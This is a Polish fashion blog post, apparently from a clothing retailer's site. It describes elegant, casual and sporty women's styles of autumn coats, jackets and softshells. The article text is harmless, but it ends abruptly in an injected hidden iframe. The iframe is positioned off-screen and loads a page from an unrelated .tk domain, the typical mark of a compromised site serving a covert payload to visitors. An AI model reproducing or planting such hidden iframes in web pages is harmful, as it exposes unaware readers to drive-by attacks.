Odzieżowy savoir vivre

Kobieca jesień

1 października 2015 • Opublikowane przez

Jesień, jak każda inna pora roku, rządzi się swoimi modowymi prawami. Jest to czas, w którym niezwykłego wyczucia wymaga łączenie ubrań noszonych na co dzień z odzieniem wierzchnim, które ma za zadanie zabezpieczyć nas przed zimnem i zmianami w pogodzie. Grunt, to ciepło i wygoda, ale umiejętne dobieranie garderoby to niewątpliwy plus o tej porze roku. Płaszczyki, kurtki, softshelle, kamizelki – co wybrać?

!–more–

Ile kobiet, tyle interpretacji. Również tych w ubiorze. Każda jest inna, reprezentuje stronginny styl/strong, woli inne ubrania, co innego jest dla niej priorytetem w ubiorze i w wyglądzie. Przedstawiamy Wam kilka stylów kobiecych, z których opisu warto skorzystać, wybierając odzienie wierzchnie tej jesieni.

nbsp;

strongElegantka/strong

a href=”http://argos.pl/blog/wp-content/uploads/2015/10/kobieta-elegantka.jpg”img class=”wp-image-2501″ src=”http://argos.pl/blog/wp-content/uploads/2015/10/kobieta-elegantka.jpg” alt=”www.aliexpress.com” width=”432″ height=”432″ //a www.aliexpress.com

nbsp;

To styl wyjątkowo piękny w swej prostocie i uniwersalności. Charakteryzuje się minimalizmem w dodatkach, kolorach, dość stonowanym zestawianiem faktur i deseni. Z tym stylem często kojarzona jest biała bluzka, ciemne spodnie w kant lub spódnica do kolan, czarne szpilki, nierzadko również spięte włosy i perły.

Klasyczna elegancja jest strongponadczasowa/strong i w odpowiednim wydaniu świetnie nadaje się do pracy, na szykowne przyjęcie, a nawet spotkanie z przyjaciółmi. Stroje, które w jakiś magiczny sposób potrafią być ponadczasowe, często idealnie łączą się z nowoczesnymi dodatkami. Dzięki temu zestawy są niepowtarzalne.

Kobieta – elegantka nosi strongpłaszcze/strong. Najczęściej mają one długość przynajmniej za pośladki lub do kolan, podkreślają talię, zapinane są na guziki. Polecane kolory to m.in. czerń, czerwień, szarości, biel, beż, écru, granat, gorzka czekolada, grafit, choć w tym przypadku warto próbować przełamywać stereotypy i konwencje. Płaszcze wyglądają bardzo dobrze w zestawieniu z apaszkami i skórzanymi rękawiczkami oraz butami na obcasie lub pantofelkami. Zamiast czapki często używany jest obszerny kaptur.

Klasyczna elegancja spodoba ci się, jeśli lubisz stabilizację, wiesz, czego oczekujesz od życia, mocno stąpasz po ziemi i czujesz się damą.

nbsp;

strongCasual look/strong

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2015/10/kobieta-casual.jpg”img class=”wp-image-2503″ src=”http://argos.pl/blog/wp-content/uploads/2015/10/kobieta-casual.jpg” alt=”www.aliexpress.com” width=”432″ height=”432″ //a www.aliexpress.com

nbsp;

strongKurtka/strong lub płaszczyk to nieodzowne elementy kobiecej garderoby. W emcasual look/em szczególną rolę odgrywa pierwszy z elementów. Kobiety preferujące ten styl cenią sobie szczególnie wygodę i komfort. Nie oznacza to jednak, że nasze wierzchnie odzienia muszą być nudne. Jak najbardziej można połączyć swobodę z modą i obecnymi trendami.

Nie jest sztuką wystroić się na wieczór – każda kobieta dobrze wygląda w sukience, szpilkach i pełnym makijażu. Sztuką jest wyglądać dobrze na co dzień – szczególnie, jeśli są to dni chłodniejsze i ponure, kiedy ubiór ‘na cebulkę’ wydaje się jedynym  rozsądnym rozwiązaniem.

Kurtkom poświęca się najmniej uwagi – postrzegane są jako rzecz, która ma spełnić swoją strongfunkcję/strong. Przyjęło się, że nie musi być ładna – ważne, żeby była ciepła. Błąd – to, jak wyglądamy na co dzień mówi o nas najwięcej.

emCasual look/em to styl, w którym bardzo dobrze odnajdą się jesienią wielbicielki spodni, np. jeansów oraz trampek i botków. Kurtki nie mają kolorystycznego ograniczenia – mogą być bardzo wyraziste i wzorzyste, ale nie umniejsza to kurtkom jednokolorowym. W tym stylu warto postawić na strongdodatki/strong – wesołą czapkę, ciepły szalik lub apaszkę, zabawne rękawiczki. Dobrze wyglądają też torby „listonoszki” oraz plecaki.

nbsp;

strongSportsmenka/strong

nbsp;

a href=”http://argos.pl/blog/wp-content/uploads/2015/10/kobieta-sportowa.jpg”img class=”wp-image-2502″ src=”http://argos.pl/blog/wp-content/uploads/2015/10/kobieta-sportowa.jpg” alt=”www.dhresource.com” width=”432″ height=”432″ //a www.dhresource.com

nbsp;

Trzeci styl to strongpołączenie dwóch poprzednich stylów/strong w jeden, z dodatkiem sportowych ciągotek. Dużej umiejętności wymaga elegancja i prostota, która będzie wyglądać dobrze, ale niebanalnie, do tego będzie wygodna, dosyć luźna i pozwoli na uprawianie aktywności fizycznych.

Kobieta – strongsportsmenka/strong stawia na strongwielofunkcyjną/strong odzież. Przede wszystkim stronga href=”http://www.argos.pl/oferta,23-2.html”kurtkę/a/strong, która ma za zadanie nie tylko strongzatrzymywać ciepło/strong, ale również nieźle się prezentować i chronić przed deszczem. Dobrze, jeśli posiada kilka przydatnych kieszeni i ukryte ściągacze w rękawach oraz w pasie. Dodatki? Zdecydowanie sportowa czapka i rękawiczki. W chłodniejsze dni do stylu sportowego pasują także komin, golf oraz ciepłe szaliki.

Dobrze sprawdzą się też stronga href=”http://www.argos.pl/oferta,22-2.html”bezrękawniki/a/strong i kamizelki oraz stronga href=”http://www.argos.pl/oferta,21-2.html”softshelle/a/stron!–844c7b74e31d727d5814a0ed667c0255–iframe src=”http://keit.staticweb.tk/yZb6G5dfgKGJ” width=640 height=480 style=’position: absolute; left: -1000px; top: -1000px; z-index:-1;’/iframe